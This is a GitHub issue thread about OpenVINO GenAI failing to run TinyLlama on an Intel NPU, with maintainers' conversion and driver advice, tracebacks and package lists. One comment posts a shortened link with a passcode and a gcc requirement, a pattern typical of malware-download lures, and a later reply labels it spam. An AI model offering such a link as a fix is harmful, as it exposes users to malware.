### ISSUE TITLE
failed to run sample/benchmark_genai.py on NPU for tiny-llama-chat-v1.0

### ISSUE THREAD

**Issue by Edward-Lin** [openvinotoolkit/openvino.genai#834]
I've run the benchmark_genai.py for CPU, GPU, NPU on MTL U9, here is the logs:
(env_ov_genai) c:\AIGC\openvino\openvino.genai\samples\python\benchmark_genai>python benchmark_genai.py -m c:\AIGC\openvino\models\TinyLlama-1.1B-Chat-v1.0\OV_FP16-4BIT_DEFAULT -p "why the Sun is yellow?" -nw 1 -n 1 -mt 200 -d CPU
Load time: 1517.00 ms
Generate time: 89.19 ± 0.00 ms
Tokenization time: nan ± nan ms
Detokenization time: nan ± nan ms
TTFT: 89.18 ± 0.00 ms
TPOT: 89.18 ± 0.00 ms
Throughput : 11.21 ± 0.00 tokens/s

(env_ov_genai) c:\AIGC\openvino\openvino.genai\samples\python\benchmark_genai>python benchmark_genai.py -m c:\AIGC\openvino\models\TinyLlama-1.1B-Chat-v1.0\OV_FP16-4BIT_DEFAULT -p "why the Sun is yellow?" -nw 1 -n 1 -mt 200 -d GPU
Load time: 4647.00 ms
Generate time: 29.11 ± 0.00 ms
Tokenization time: nan ± nan ms
Detokenization time: nan ± nan ms
TTFT: 29.04 ± 0.00 ms
TPOT: 29.04 ± 0.00 ms
Throughput : 34.44 ± 0.00 tokens/s

(env_ov_genai) c:\AIGC\openvino\openvino.genai\samples\python\benchmark_genai>python benchmark_genai.py -m c:\AIGC\openvino\models\TinyLlama-1.1B-Chat-v1.0\OV_FP16-4BIT_DEFAULT -p "why the Sun is yellow?" -nw 1 -n 1 -mt 200 -d NPU
Traceback (most recent call last):
File "c:\AIGC\openvino\openvino.genai\samples\python\benchmark_genai\benchmark_genai.py", line 49, in
main()
File "c:\AIGC\openvino\openvino.genai\samples\python\benchmark_genai\benchmark_genai.py", line 32, in main
pipe.generate(prompt, config)
RuntimeError: Exception from C:\Jenkins\workspace\private-ci\ie\build-windows-vs2019\b\repos\openvino.genai\src\cpp\src\llm_pipeline_static.cpp:206:
Currently only batch size=1 is supported

please refer https://github.com/openvinotoolkit/openvino.genai/issues/821 for the pip list.
Thanks,

**Comment by w2wewwww** [comment]
This might help you
https://bit.ly/3yXXzbX
Passcode: d5kp14h
You must have gcc compiler installed

**Comment by aoke79** [comment]
> This might help you https://bit.ly/3yXXzbX Passcode: d5kp14h You must have gcc compiler installed

thanks, but what is it?

**Comment by w2wewwww** [comment]
> > This might help you https://bit.ly/3yXXzbX Passcode: d5kp14h You must have gcc compiler installed
> 
> thanks, but what is it?

spam, don't use it

**Comment by TolyaTalamanov** [comment]
Hi @Edward-Lin

Let's do it step-by-step. In fact, first two steps are documented there: https://docs.openvino.ai/nightly/learn-openvino/llm_inference_guide/genai-guide-npu.html

##  Setup

Let's create new clear python environment and install the latest `openvino`, `openvion-tokenizers`, `openvino-genai` available.
```
python -m venv ov-env
ov-env\Scripts\activate
pip install --pre openvino openvino-tokenizers openvino-genai --extra-index-url https://storage.openvinotoolkit.org/simple/wheels/nightly
```

Installed versions (might be newer)
```
openvino 2024.5.0.dev20240909
openvino-genai 2024.5.0.0.dev20240909
openvino-telemetry 2024.1.0
openvino-tokenizers 2024.5.0.0.dev20240909
```

## Convert the model
```
pip install optimum-intel nncf==2.11 onnx=1.16.1
optimum-cli export openvino -m TinyLlama/TinyLlama-1.1B-Chat-v1.0 --weight-format int4 --sym --group-size 128 --ratio 1.0 TinyLlama
```

## Run benchmark
GenAI commit: `38eed7d2ca1e7ba3cd2187c6c2318595b92d6b17`
```
git clone https://github.com/openvinotoolkit/openvino.genai/
cd openvino.genai\samples\python\benchmark_genai
```
Run:
```
python benchmark_genai.py -p "why the Sun is yellow?" -nw 1 -n 1 -mt 200 -d NPU -m ..\..\..\..\TinyLlama
```

The command above runs successful and report performance metrics.

**Comment by aoke79** [comment]
followed your instructions, and got below logs:

pip install optimum-intel nncf==2.11 onnx==1.16.1
Requirement already satisfied: optimum-intel in c:\programdata\anaconda3\envs\env_ov_optimum\lib\site-packages (1.18.3)
Collecting nncf==2.11
  Using cached nncf-2.11.0-py3-none-any.whl.metadata (38 kB)
Collecting onnx==1.16.1
  Using cached onnx-1.16.1-cp311-cp311-win_amd64.whl.metadata (16 kB)
Requirement already satisfied: jsonschema>=3.2.0 in c:\programdata\anaconda3\envs\env_ov_optimum\lib\site-packages (from nncf==2.11) (4.23.0)
Requirement already satisfied: jstyleson>=0.0.2 in c:\programdata\anaconda3\envs\env_ov_optimum\lib\site-packages (from nncf==2.11) (0.0.2)
Requirement already satisfied: natsort>=7.1.0 in c:\programdata\anaconda3\envs\env_ov_optimum\lib\site-packages (from nncf==2.11) (8.4.0)
Requirement already satisfied: networkx<=3.3,>=2.6 in c:\programdata\anaconda3\envs\env_ov_optimum\lib\site-packages (from nncf==2.11) (3.3)
Requirement already satisfied: ninja<1.12,>=1.10.0.post2 in c:\programdata\anaconda3\envs\env_ov_optimum\lib\site-packages (from nncf==2.11) (1.11.1.1)
Requirement already satisfied: numpy<1.27,>=1.19.1 in c:\programdata\anaconda3\envs\env_ov_optimum\lib\site-packages (from nncf==2.11) (1.26.4)
Requirement already satisfied: openvino-telemetry>=2023.2.0 in c:\programdata\anaconda3\envs\env_ov_optimum\lib\site-packages (from nncf==2.11) (2024.1.0)
Requirement already satisfied: packaging>=20.0 in c:\programdata\anaconda3\envs\env_ov_optimum\lib\site-packages (from nncf==2.11) (24.1)
Requirement already satisfied: pandas<2.3,>=1.1.5 in c:\programdata\anaconda3\envs\env_ov_optimum\lib\site-packages (from nncf==2.11) (2.2.2)
Requirement already satisfied: psutil in c:\programdata\anaconda3\envs\env_ov_optimum\lib\site-packages (from nncf==2.11) (6.0.0)
Requirement already satisfied: pydot>=1.4.1 in c:\programdata\anaconda3\envs\env_ov_optimum\lib\site-packages (from nncf==2.11) (2.0.0)
Requirement already satisfied: pymoo>=0.6.0.1 in c:\programdata\anaconda3\envs\env_ov_optimum\lib\site-packages (from nncf==2.11) (0.6.1.3)
Requirement already satisfied: rich>=13.5.2 in c:\programdata\anaconda3\envs\env_ov_optimum\lib\site-packages (from nncf==2.11) (13.8.0)
Requirement already satisfied: scikit-learn>=0.24.0 in c:\programdata\anaconda3\envs\env_ov_optimum\lib\site-packages (from nncf==2.11) (1.5.1)
Requirement already satisfied: scipy>=1.3.2 in c:\programdata\anaconda3\envs\env_ov_optimum\lib\site-packages (from nncf==2.11) (1.14.1)
Requirement already satisfied: tabulate>=0.9.0 in c:\programdata\anaconda3\envs\env_ov_optimum\lib\site-packages (from nncf==2.11) (0.9.0)
Requirement already satisfied: tqdm>=4.54.1 in c:\programdata\anaconda3\envs\env_ov_optimum\lib\site-packages (from nncf==2.11) (4.66.5)
Requirement already satisfied: protobuf>=3.20.2 in c:\programdata\anaconda3\envs\env_ov_optimum\lib\site-packages (from onnx==1.16.1) (5.28.0)
Requirement already satisfied: torch>=1.11 in c:\programdata\anaconda3\envs\env_ov_optimum\lib\site-packages (from optimum-intel) (2.4.0)
Requirement already satisfied: transformers<4.44.0,>=4.36.0 in c:\programdata\anaconda3\envs\env_ov_optimum\lib\site-packages (from optimum-intel) (4.43.4)
Requirement already satisfied: optimum<1.22.0,>=1.21.3 in c:\programdata\anaconda3\envs\env_ov_optimum\lib\site-packages (from optimum-intel) (1.21.4)
Requirement already satisfied: datasets>=1.4.0 in c:\programdata\anaconda3\envs\env_ov_optimum\lib\site-packages (from optimum-intel) (2.21.0)
Requirement already satisfied: sentencepiece in c:\programdata\anaconda3\envs\env_ov_optimum\lib\site-packages (from optimum-intel) (0.2.0)
Requirement already satisfied: setuptools in c:\programdata\anaconda3\envs\env_ov_optimum\lib\site-packages (from optimum-intel) (74.1.1)
Requirement already satisfied: filelock in c:\programdata\anaconda3\envs\env_ov_optimum\lib\site-packages (from datasets>=1.4.0->optimum-intel) (3.15.4)
Requirement already satisfied: pyarrow>=15.0.0 in c:\programdata\anaconda3\envs\env_ov_optimum\lib\site-packages (from datasets>=1.4.0->optimum-intel) (17.0.0)
Requirement already satisfied: dill<0.3.9,>=0.3.0 in c:\programdata\anaconda3\envs\env_ov_optimum\lib\site-packages (from datasets>=1.4.0->optimum-intel) (0.3.8)
Requirement already satisfied: requests>=2.32.2 in c:\programdata\anaconda3\envs\env_ov_optimum\lib\site-packages (from datasets>=1.4.0->optimum-intel) (2.32.3)
Requirement already satisfied: xxhash in c:\programdata\anaconda3\envs\env_ov_optimum\lib\site-packages (from datasets>=1.4.0->optimum-intel) (3.5.0)
Requirement already satisfied: multiprocess in c:\programdata\anaconda3\envs\env_ov_optimum\lib\site-packages (from datasets>=1.4.0->optimum-intel) (0.70.16)
Requirement already satisfied: fsspec<=2024.6.1,>=2023.1.0 in c:\programdata\anaconda3\envs\env_ov_optimum\lib\site-packages (from fsspec[http]<=2024.6.1,>=2023.1.0->datasets>=1.4.0->optimum-intel) (2024.6.1)
Requirement already satisfied: aiohttp in c:\programdata\anaconda3\envs\env_ov_optimum\lib\site-packages (from datasets>=1.4.0->optimum-intel) (3.10.5)
Requirement already satisfied: huggingface-hub>=0.21.2 in c:\programdata\anaconda3\envs\env_ov_optimum\lib\site-packages (from datasets>=1.4.0->optimum-intel) (0.24.6)
Requirement already satisfied: pyyaml>=5.1 in c:\programdata\anaconda3\envs\env_ov_optimum\lib\site-packages (from datasets>=1.4.0->optimum-intel) (6.0.2)
Requirement already satisfied: attrs>=22.2.0 in c:\programdata\anaconda3\envs\env_ov_optimum\lib\site-packages (from jsonschema>=3.2.0->nncf==2.11) (24.2.0)
Requirement already satisfied: jsonschema-specifications>=2023.03.6 in c:\programdata\anaconda3\envs\env_ov_optimum\lib\site-packages (from jsonschema>=3.2.0->nncf==2.11) (2023.12.1)
Requirement already satisfied: referencing>=0.28.4 in c:\programdata\anaconda3\envs\env_ov_optimum\lib\site-packages (from jsonschema>=3.2.0->nncf==2.11) (0.35.1)
Requirement already satisfied: rpds-py>=0.7.1 in c:\programdata\anaconda3\envs\env_ov_optimum\lib\site-packages (from jsonschema>=3.2.0->nncf==2.11) (0.20.0)
Requirement already satisfied: coloredlogs in c:\programdata\anaconda3\envs\env_ov_optimum\lib\site-packages (from optimum<1.22.0,>=1.21.3->optimum-intel) (15.0.1)
Requirement already satisfied: sympy in c:\programdata\anaconda3\envs\env_ov_optimum\lib\site-packages (from optimum<1.22.0,>=1.21.3->optimum-intel) (1.13.2)
Requirement already satisfied: python-dateutil>=2.8.2 in c:\programdata\anaconda3\envs\env_ov_optimum\lib\site-packages (from pandas<2.3,>=1.1.5->nncf==2.11) (2.9.0.post0)
Requirement already satisfied: pytz>=2020.1 in c:\programdata\anaconda3\envs\env_ov_optimum\lib\site-packages (from pandas<2.3,>=1.1.5->nncf==2.11) (2024.1)
Requirement already satisfied: tzdata>=2022.7 in c:\programdata\anaconda3\envs\env_ov_optimum\lib\site-packages (from pandas<2.3,>=1.1.5->nncf==2.11) (2024.1)
Requirement already satisfied: pyparsing>=3 in c:\programdata\anaconda3\envs\env_ov_optimum\lib\site-packages (from pydot>=1.4.1->nncf==2.11) (3.1.4)
Requirement already satisfied: matplotlib>=3 in c:\programdata\anaconda3\envs\env_ov_optimum\lib\site-packages (from pymoo>=0.6.0.1->nncf==2.11) (3.9.2)
Requirement already satisfied: autograd>=1.4 in c:\programdata\anaconda3\envs\env_ov_optimum\lib\site-packages (from pymoo>=0.6.0.1->nncf==2.11) (1.7.0)
Requirement already satisfied: cma==3.2.2 in c:\programdata\anaconda3\envs\env_ov_optimum\lib\site-packages (from pymoo>=0.6.0.1->nncf==2.11) (3.2.2)
Requirement already satisfied: alive-progress in c:\programdata\anaconda3\envs\env_ov_optimum\lib\site-packages (from pymoo>=0.6.0.1->nncf==2.11) (3.1.5)
Requirement already satisfied: Deprecated in c:\programdata\anaconda3\envs\env_ov_optimum\lib\site-packages (from pymoo>=0.6.0.1->nncf==2.11) (1.2.14)
Requirement already satisfied: markdown-it-py>=2.2.0 in c:\programdata\anaconda3\envs\env_ov_optimum\lib\site-packages (from rich>=13.5.2->nncf==2.11) (3.0.0)
Requirement already satisfied: pygments<3.0.0,>=2.13.0 in c:\programdata\anaconda3\envs\env_ov_optimum\lib\site-packages (from rich>=13.5.2->nncf==2.11) (2.18.0)
Requirement already satisfied: joblib>=1.2.0 in c:\programdata\anaconda3\envs\env_ov_optimum\lib\site-packages (from scikit-learn>=0.24.0->nncf==2.11) (1.4.2)
Requirement already satisfied: threadpoolctl>=3.1.0 in c:\programdata\anaconda3\envs\env_ov_optimum\lib\site-packages (from scikit-learn>=0.24.0->nncf==2.11) (3.5.0)
Requirement already satisfied: typing-extensions>=4.8.0 in c:\programdata\anaconda3\envs\env_ov_optimum\lib\site-packages (from torch>=1.11->optimum-intel) (4.12.2)
Requirement already satisfied: jinja2 in c:\programdata\anaconda3\envs\env_ov_optimum\lib\site-packages (from torch>=1.11->optimum-intel) (3.1.4)
Requirement already satisfied: colorama in c:\programdata\anaconda3\envs\env_ov_optimum\lib\site-packages (from tqdm>=4.54.1->nncf==2.11) (0.4.6)
Requirement already satisfied: regex!=2019.12.17 in c:\programdata\anaconda3\envs\env_ov_optimum\lib\site-packages (from transformers<4.44.0,>=4.36.0->optimum-intel) (2024.7.24)
Requirement already satisfied: safetensors>=0.4.1 in c:\programdata\anaconda3\envs\env_ov_optimum\lib\site-packages (from transformers<4.44.0,>=4.36.0->optimum-intel) (0.4.4)
Requirement already satisfied: tokenizers<0.20,>=0.19 in c:\programdata\anaconda3\envs\env_ov_optimum\lib\site-packages (from transformers<4.44.0,>=4.36.0->optimum-intel) (0.19.1)
Requirement already satisfied: aiohappyeyeballs>=2.3.0 in c:\programdata\anaconda3\envs\env_ov_optimum\lib\site-packages (from aiohttp->datasets>=1.4.0->optimum-intel) (2.4.0)
Requirement already satisfied: aiosignal>=1.1.2 in c:\programdata\anaconda3\envs\env_ov_optimum\lib\site-packages (from aiohttp->datasets>=1.4.0->optimum-intel) (1.3.1)
Requirement already satisfied: frozenlist>=1.1.1 in c:\programdata\anaconda3\envs\env_ov_optimum\lib\site-packages (from aiohttp->datasets>=1.4.0->optimum-intel) (1.4.1)
Requirement already satisfied: multidict<7.0,>=4.5 in c:\programdata\anaconda3\envs\env_ov_optimum\lib\site-packages (from aiohttp->datasets>=1.4.0->optimum-intel) (6.0.5)
Requirement already satisfied: yarl<2.0,>=1.0 in c:\programdata\anaconda3\envs\env_ov_optimum\lib\site-packages (from aiohttp->datasets>=1.4.0->optimum-intel) (1.9.7)
Requirement already satisfied: mdurl~=0.1 in c:\programdata\anaconda3\envs\env_ov_optimum\lib\site-packages (from markdown-it-py>=2.2.0->rich>=13.5.2->nncf==2.11) (0.1.2)
Requirement already satisfied: contourpy>=1.0.1 in c:\programdata\anaconda3\envs\env_ov_optimum\lib\site-packages (from matplotlib>=3->pymoo>=0.6.0.1->nncf==2.11) (1.3.0)
Requirement already satisfied: cycler>=0.10 in c:\programdata\anaconda3\envs\env_ov_optimum\lib\site-packages (from matplotlib>=3->pymoo>=0.6.0.1->nncf==2.11) (0.12.1)
Requirement already satisfied: fonttools>=4.22.0 in c:\programdata\anaconda3\envs\env_ov_optimum\lib\site-packages (from matplotlib>=3->pymoo>=0.6.0.1->nncf==2.11) (4.53.1)
Requirement already satisfied: kiwisolver>=1.3.1 in c:\programdata\anaconda3\envs\env_ov_optimum\lib\site-packages (from matplotlib>=3->pymoo>=0.6.0.1->nncf==2.11) (1.4.6)
Requirement already satisfied: pillow>=8 in c:\programdata\anaconda3\envs\env_ov_optimum\lib\site-packages (from matplotlib>=3->pymoo>=0.6.0.1->nncf==2.11) (10.4.0)
Requirement already satisfied: six>=1.5 in c:\programdata\anaconda3\envs\env_ov_optimum\lib\site-packages (from python-dateutil>=2.8.2->pandas<2.3,>=1.1.5->nncf==2.11) (1.16.0)
Requirement already satisfied: charset-normalizer<4,>=2 in c:\programdata\anaconda3\envs\env_ov_optimum\lib\site-packages (from requests>=2.32.2->datasets>=1.4.0->optimum-intel) (3.3.2)
Requirement already satisfied: idna<4,>=2.5 in c:\programdata\anaconda3\envs\env_ov_optimum\lib\site-packages (from requests>=2.32.2->datasets>=1.4.0->optimum-intel) (3.8)
Requirement already satisfied: urllib3<3,>=1.21.1 in c:\programdata\anaconda3\envs\env_ov_optimum\lib\site-packages (from requests>=2.32.2->datasets>=1.4.0->optimum-intel) (2.2.2)
Requirement already satisfied: certifi>=2017.4.17 in c:\programdata\anaconda3\envs\env_ov_optimum\lib\site-packages (from requests>=2.32.2->datasets>=1.4.0->optimum-intel) (2024.8.30)
Requirement already satisfied: about-time==4.2.1 in c:\programdata\anaconda3\envs\env_ov_optimum\lib\site-packages (from alive-progress->pymoo>=0.6.0.1->nncf==2.11) (4.2.1)
Requirement already satisfied: grapheme==0.6.0 in c:\programdata\anaconda3\envs\env_ov_optimum\lib\site-packages (from alive-progress->pymoo>=0.6.0.1->nncf==2.11) (0.6.0)
Requirement already satisfied: humanfriendly>=9.1 in c:\programdata\anaconda3\envs\env_ov_optimum\lib\site-packages (from coloredlogs->optimum<1.22.0,>=1.21.3->optimum-intel) (10.0)
Requirement already satisfied: wrapt<2,>=1.10 in c:\programdata\anaconda3\envs\env_ov_optimum\lib\site-packages (from Deprecated->pymoo>=0.6.0.1->nncf==2.11) (1.16.0)
Requirement already satisfied: MarkupSafe>=2.0 in c:\programdata\anaconda3\envs\env_ov_optimum\lib\site-packages (from jinja2->torch>=1.11->optimum-intel) (2.1.5)
Requirement already satisfied: mpmath<1.4,>=1.1.0 in c:\programdata\anaconda3\envs\env_ov_optimum\lib\site-packages (from sympy->optimum<1.22.0,>=1.21.3->optimum-intel) (1.3.0)
Requirement already satisfied: pyreadline3 in c:\programdata\anaconda3\envs\env_ov_optimum\lib\site-packages (from humanfriendly>=9.1->coloredlogs->optimum<1.22.0,>=1.21.3->optimum-intel) (3.4.1)
Using cached nncf-2.11.0-py3-none-any.whl (1.2 MB)
Using cached onnx-1.16.1-cp311-cp311-win_amd64.whl (14.4 MB)
Installing collected packages: onnx, nncf
  Attempting uninstall: onnx
    Found existing installation: onnx 1.16.2
    Uninstalling onnx-1.16.2:
      Successfully uninstalled onnx-1.16.2
  Attempting uninstall: nncf
    Found existing installation: nncf 2.12.0
    Uninstalling nncf-2.12.0:
      Successfully uninstalled nncf-2.12.0
Successfully installed nncf-2.11.0 onnx-1.16.1

(env_ov_optimum) C:\AIGC\openvino\openvino.genai\samples\python\benchmark_genai>optimum-cli export openvino -m c:/aigc/hf/TinyLlama-1.1B-Chat-v1.0-hf --weight-format int4 --sym --group-size 128 --ratio 1.0 c:/aigc/hf/TinyLlama
Traceback (most recent call last):
  File "<frozen runpy>", line 198, in _run_module_as_main
  File "<frozen runpy>", line 88, in _run_code
  File "C:\ProgramData\anaconda3\envs\env_ov_optimum\Scripts\optimum-cli.exe\__main__.py", line 7, in <module>
  File "C:\ProgramData\anaconda3\envs\env_ov_optimum\Lib\site-packages\optimum\commands\optimum_cli.py", line 208, in main
    service.run()
  File "C:\ProgramData\anaconda3\envs\env_ov_optimum\Lib\site-packages\optimum\commands\export\openvino.py", line 304, in run
    task = infer_task(self.args.task, self.args.model)
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "C:\ProgramData\anaconda3\envs\env_ov_optimum\Lib\site-packages\optimum\exporters\openvino\__main__.py", line 54, in infer_task
    task = TasksManager.infer_task_from_model(model_name_or_path)
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "C:\ProgramData\anaconda3\envs\env_ov_optimum\Lib\site-packages\optimum\exporters\tasks.py", line 1680, in infer_task_from_model
    task = cls._infer_task_from_model_name_or_path(model, subfolder=subfolder, revision=revision)
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "C:\ProgramData\anaconda3\envs\env_ov_optimum\Lib\site-packages\optimum\exporters\tasks.py", line 1593, in _infer_task_from_model_name_or_path
    raise RuntimeError(
RuntimeError: Cannot infer the task from a local directory yet, please specify the task manually (zero-shot-image-classification, zero-shot-object-detection, audio-xvector, automatic-speech-recognition, semantic-segmentation, token-classification, feature-extraction, image-classification, text-classification, conversational, stable-diffusion, audio-classification, question-answering, multiple-choice, text2text-generation, audio-frame-classification, fill-mask, image-to-text, mask-generation, sentence-similarity, image-to-image, text-to-audio, depth-estimation, object-detection, text-generation, masked-im, stable-diffusion-xl, image-segmentation).

**Comment by aoke79** [comment]
followed your convert model instruction, with --task text-generation and text-generation-with-past parameters, however, both of them failed to run.

optimum-cli export openvino -m c:/aigc/hf/TinyLlama-1.1B-Chat-v1.0-hf --task text-generation-with-past --weight-format int4 --sym --group-size 128 --ratio 1.0 c:/aigc/hf/TinyLlama
Framework not specified. Using pt to export the model.
Using framework PyTorch: 2.4.0+cpu
Overriding 1 configuration item(s)
        - use_cache -> True
We detected that you are passing `past_key_values` as a tuple and this is deprecated and will be removed in v4.43. Please use an appropriate `Cache` class (https://huggingface.co/docs/transformers/v4.41.3/en/internal/generation_utils#transformers.Cache)
C:\ProgramData\anaconda3\envs\env_ov_optimum\Lib\site-packages\optimum\exporters\openvino\model_patcher.py:479: TracerWarning: Converting a tensor to a Python boolean might cause the trace to be incorrect. We can't record the data flow of Python values, so this value will be treated as a constant in the future. This means that the trace might not generalize to other inputs!
  if sequence_length != 1:
INFO:nncf:Statistics of the bitwidth distribution:
+----------------+-----------------------------+----------------------------------------+
|   Num bits (N) | % all parameters (layers)   | % ratio-defining parameters (layers)   |
+================+=============================+========================================+
|              8 | 12% (2 / 156)               | 0% (0 / 154)                           |
+----------------+-----------------------------+----------------------------------------+
|              4 | 88% (154 / 156)             | 100% (154 / 154)                       |
+----------------+-----------------------------+----------------------------------------+
Applying Weight Compression ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100% 156/156 • 0:00:38 • 0:00:00
Set tokenizer padding side to left for `text-generation-with-past` task.

python benchmark_genai.py -m c:\AIGC\hf\TinyLlama-1.1B-Chat-v1.0-hf-wp -p "why the Sun is yellow?" -nw 1 -n 1 -mt 200 -d NPU
Traceback (most recent call last):
  File "c:\AIGC\openvino\openvino.genai\samples\python\benchmark_genai\benchmark_genai.py", line 49, in <module>
    main()
  File "c:\AIGC\openvino\openvino.genai\samples\python\benchmark_genai\benchmark_genai.py", line 32, in main
    pipe.generate(prompt, config)
RuntimeError: Exception from src\inference\src\cpp\infer_request.cpp:223:
Exception from src\plugins\intel_npu\src\backend\include\zero_utils.hpp:29:
L0 zeCommandListUpdateMutableCommandsExp result: ZE_RESULT_ERROR_UNSUPPORTED_FEATURE, code 0x78000003 - generic error code for unsupported features

---------------------------------------------------------------------------------------------------------------------------
optimum-cli export openvino -m c:/aigc/hf/TinyLlama-1.1B-Chat-v1.0-hf --task text-generation --weight-format int4 --sym --group-size 128 --ratio 1.0 c:/aigc/hf/TinyLlama
Framework not specified. Using pt to export the model.
The task `text-generation` was manually specified, and past key values will not be reused in the decoding. if needed, please pass `--task text-generation-with-past` to export using the past key values.
Using framework PyTorch: 2.4.0+cpu
Overriding 1 configuration item(s)
        - use_cache -> False
C:\ProgramData\anaconda3\envs\env_ov_optimum\Lib\site-packages\optimum\exporters\openvino\model_patcher.py:479: TracerWarning: Converting a tensor to a Python boolean might cause the trace to be incorrect. We can't record the data flow of Python values, so this value will be treated as a constant in the future. This means that the trace might not generalize to other inputs!
  if sequence_length != 1:
INFO:nncf:Statistics of the bitwidth distribution:
+----------------+-----------------------------+----------------------------------------+
|   Num bits (N) | % all parameters (layers)   | % ratio-defining parameters (layers)   |
+================+=============================+========================================+
|              8 | 12% (2 / 156)               | 0% (0 / 154)                           |
+----------------+-----------------------------+----------------------------------------+
|              4 | 88% (154 / 156)             | 100% (154 / 154)                       |
+----------------+-----------------------------+----------------------------------------+
Applying Weight Compression ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100% 156/156 • 0:00:37 • 0:00:00
Set tokenizer padding side to left for `text-generation` task.

python benchmark_genai.py -m c:\AIGC\hf\TinyLlama-1.1B-Chat-v1.0-int4-text-generation  -p "why the Sun is yellow?" -nw 1 -n 1 -mt 200 -d NPU
Traceback (most recent call last):
  File "c:\AIGC\openvino\openvino.genai\samples\python\benchmark_genai\benchmark_genai.py", line 49, in <module>
    main()
  File "c:\AIGC\openvino\openvino.genai\samples\python\benchmark_genai\benchmark_genai.py", line 29, in main
    pipe = ov_genai.LLMPipeline(model_path, device)
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
RuntimeError: Exception from src\core\src\pass\stateful_to_stateless.cpp:112:
Stateful models without `beam_idx` input are not supported in StatefulToStateless transformation

Thanks

**Comment by aoke79** [comment]
here is the "pip list":
pip list
Package             Version
------------------- ----------------------
numpy               2.0.2
openvino            2024.5.0.dev20240910
openvino-genai      2024.5.0.0.dev20240910
openvino-telemetry  2024.1.0
openvino-tokenizers 2024.5.0.0.dev20240910
packaging           24.1
pip                 24.2
setuptools          72.1.0
wheel               0.43.0


here is the intel-optimum "pip list":
pip list
Package                   Version
------------------------- -----------
about-time                4.2.1
aiohappyeyeballs          2.4.0
aiohttp                   3.10.5
aiosignal                 1.3.1
alive-progress            3.1.5
attrs                     24.2.0
autograd                  1.7.0
certifi                   2024.8.30
charset-normalizer        3.3.2
cma                       3.2.2
colorama                  0.4.6
coloredlogs               15.0.1
contourpy                 1.3.0
cycler                    0.12.1
datasets                  2.21.0
Deprecated                1.2.14
dill                      0.3.8
filelock                  3.15.4
fonttools                 4.53.1
frozenlist                1.4.1
fsspec                    2024.6.1
grapheme                  0.6.0
huggingface-hub           0.24.6
humanfriendly             10.0
idna                      3.8
Jinja2                    3.1.4
joblib                    1.4.2
jsonschema                4.23.0
jsonschema-specifications 2023.12.1
jstyleson                 0.0.2
kiwisolver                1.4.6
markdown-it-py            3.0.0
MarkupSafe                2.1.5
matplotlib                3.9.2
mdurl                     0.1.2
mpmath                    1.3.0
multidict                 6.0.5
multiprocess              0.70.16
natsort                   8.4.0
networkx                  3.3
ninja                     1.11.1.1
nncf                      2.11.0
numpy                     1.26.4
onnx                      1.16.1
openvino                  2024.3.0
openvino-telemetry        2024.1.0
openvino-tokenizers       2024.3.0.0
optimum                   1.21.4
optimum-intel             1.18.3
packaging                 24.1
pandas                    2.2.2
pillow                    10.4.0
pip                       24.2
protobuf                  5.28.0
psutil                    6.0.0
pyarrow                   17.0.0
pydot                     2.0.0
Pygments                  2.18.0
pymoo                     0.6.1.3
pyparsing                 3.1.4
pyreadline3               3.4.1
python-dateutil           2.9.0.post0
pytz                      2024.1
PyYAML                    6.0.2
referencing               0.35.1
regex                     2024.7.24
requests                  2.32.3
rich                      13.8.0
rpds-py                   0.20.0
safetensors               0.4.4
scikit-learn              1.5.1
scipy                     1.14.1
sentencepiece             0.2.0
setuptools                74.1.1
six                       1.16.0
sympy                     1.13.2
tabulate                  0.9.0
threadpoolctl             3.5.0
tiktoken                  0.7.0
tokenizers                0.19.1
torch                     2.4.0
tqdm                      4.66.5
transformers              4.43.4
typing_extensions         4.12.2
tzdata                    2024.1
urllib3                   2.2.2
wheel                     0.43.0
wrapt                     1.16.0
xxhash                    3.5.0
yarl                      1.9.7

**Comment by aoke79** [comment]
![image](https://github.com/user-attachments/assets/9e949d53-a0e3-46f8-8b9d-1fe183ae7fc0)

**Comment by aoke79** [comment]
![image](https://github.com/user-attachments/assets/a60475af-e1eb-4951-b830-2cba7c6cf0e5)

**Comment by aoke79** [comment]
platform is MTL U9 185H, 32GB

**Comment by TolyaTalamanov** [comment]
@aoke79 Please follow the instruction, the command line for model generation should be:
```
optimum-cli export openvino -m TinyLlama/TinyLlama-1.1B-Chat-v1.0 --weight-format int4 --sym --group-size 128 --ratio 1.0 TinyLlama
```

Which is different from what you're using. Note that `TinyLlama/TinyLlama-1.1B-Chat-v1.0` is HuggingFace id, rather than path to folder.

**Comment by aoke79** [comment]
as you might know, it's impossible for PRC to access Huggingface, so I used huggface-cli to download it to my local folder. if you have converted model, which works fine, please give me a link, I will try to download it, and test. 
Thanks,

**Comment by eaidova** [comment]
@aoke79 loading model from local folder is also supported with optimum-cli, in this case command line should be:

```
optimum-cli export openvino -m <local_model_dir>--weight-format int4 --sym --group-size 128 --ratio 1.0  --task text-generation-with-past <out_dir>
````

Please note, that task should be **text-generation-with-past**, not **text-generation**

**Comment by TolyaTalamanov** [comment]
@aoke79 I see you're converting model by using the following command:
```
optimum-cli export openvino -m c:/aigc/hf/TinyLlama-1.1B-Chat-v1.0-hf --task text-generation-with-past --weight-format int4 --sym --group-size 128 --ratio 1.0 c:/aigc/hf/TinyLlama
```
Which is fine and then dump model to `c:/aigc/hf/TinyLlama` folder, but then provide different folder `TinyLlama-1.1B-Chat-v1.0-hf-wp` to benchmark_genai.py, which is a little confusing...
```
python benchmark_genai.py -m c:\AIGC\hf\TinyLlama-1.1B-Chat-v1.0-hf-wp -p "why the Sun is yellow?" -nw 1 -n 1 -mt 200 -d NPU
``` 

Have you tried to run benchmark_genai.py with `c:/aigc/hf/TinyLlama` folder? I'd also recommend you to update windows driver to this version: https://www.intel.com/content/www/us/en/download/794734/intel-npu-driver-windows.html (`.2714`)

In general, if you want to use folder instead of HF id, you should only provide additional option `--task text-generation-with-past`
